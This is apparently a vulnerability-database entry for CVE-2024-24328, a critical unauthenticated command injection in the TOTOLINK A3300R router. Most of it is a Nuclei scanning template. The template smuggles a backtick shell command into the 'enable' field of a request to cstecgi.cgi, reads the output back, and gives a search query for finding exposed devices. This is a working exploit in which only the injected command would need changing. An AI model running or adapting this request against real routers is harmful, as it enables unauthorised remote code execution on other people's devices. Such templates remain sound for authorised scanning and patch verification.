漏洞描述
TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setMacFilterRules function.
CVE-2024-24328: TotoLink Router setMacFilterRules - Command Injection
PoC代码[已公开]
id: CVE-2024-24328
info:
name: TotoLink Router setMacFilterRules - Command Injection
author: pussycat0x
severity: critical
description: |
TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setMacFilterRules function.
reference:
- https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/12/TOTOlink%20A3300R%20setMacFilterRules.md
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-24328
cwe-id: CWE-78
epss-score: 0.84416
epss-percentile: 0.99277
cpe: cpe:2.3:o:totolink:a3300r_firmware:17.0.0cu.557_b20221024:*:*:*:*:*:*:*
metadata:
vendor: totolink
product: a3300r_firmware
fofa-query: title="totolink"
tags: cve,cve2024,totolink,routers,unauth,intrusive,vkev
http:
- raw:
- |
POST /cgi-bin/cstecgi.cgi?token= HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Origin: {{RootURL}}
Referer: {{RootURL}}/advance/portfwd.html?token=
{"enable":"1`ls>/web/{{randstr}}.txt`","addEffect":"0","topicurl":"setMacFilterRules"}
- |
GET /{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
Referer: {{RootURL}}}}/advance/portfwd.html?token=
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && status_code_2 == 200'
- 'contains(body_1, "\"success\":true") && contains_all(body_2, "bin","etc")'
condition: and
# digest: 4a0a00473045022100cb536dc7f9ab739bf72c60da6248f0aef4b3febc1a7ae0fe70750c8b9ec5681f02202dd6249c9346f0e191fcfe80f215237806d740d4486a0e42d747ed934b9633ce:922c64590222798bb761d5b6d8e72950